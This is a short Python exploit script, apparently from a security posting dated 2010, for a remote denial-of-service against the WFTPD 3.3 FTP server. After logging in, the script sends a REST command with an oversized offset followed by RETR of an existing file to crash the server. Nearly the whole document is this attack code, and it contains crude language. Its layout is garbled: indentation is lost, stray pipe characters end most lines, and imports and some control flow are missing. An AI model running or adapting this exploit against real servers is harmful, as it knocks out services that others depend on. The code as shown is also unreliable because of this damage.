# WFTPD 3.3 unhandled exception
# -*- coding: windows-1252 -*- |
print ("Usage: wftpdkill <host> <login> <password> <existingfle>\n") |
def dos_it(hostname, username, passwd, exfile): |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
sock.connect((hostname, 21)) |
print ("[-] Connection error!") |
sock.send("user %s\r\n" %username) |
sock.send("pass %s\r\n" %passwd) |
print "Send evil commands" |
sock.send("rest 999999999999999999999999999999999999999999999999999999999999999999\r\n") |
sock.send("retr %s\r\n" %exfile) |
sock.send("Burn, muthfcka, burn!\r\n") |
print "Server killed\r\n" |
print ("\nWFTPD 3.3 remote DoS exploit") |
dos_it(hostname,username,passwd,exfile) |
Post Published: 16 March 2010
Author: Georges Kut
Found in section:
Security
Tags: WFTPD